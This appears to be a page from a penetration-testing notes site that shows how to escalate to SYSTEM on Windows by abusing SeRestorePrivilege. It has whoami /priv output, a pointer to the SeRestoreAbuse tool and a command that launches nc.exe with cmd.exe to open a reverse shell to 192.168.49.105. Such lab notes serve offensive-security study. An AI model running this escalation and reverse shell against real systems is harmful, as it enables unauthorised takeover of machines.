SeRestore Privilege

Initial Detection

Evil-WinRM* PS C:\Users\svc_apache$\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

GitHub - xct/SeRestoreAbuse: SeRestorePrivilege to SYSTEMGitHub

Build the code using Visual Studio Code 2022.

Once compiled transfer nc.exe or your own payload.

SeRestoreAbuse.exe "C:\Users\svc_apache$\Documents\nc.exe 192.168.49.105 1234 -e cmd.exe"

Examples of SeRestore Privilege Exploitation

https://app.gitbook.com/s/8orEMrbW2JUz78N6Vl5G/priv-escalation (Heist)

PreviousSeLoadDriver Privilege NextSeImpersonatePrivilege

Last updated 3 years ago

hashtagInitial Detection

Initial Detection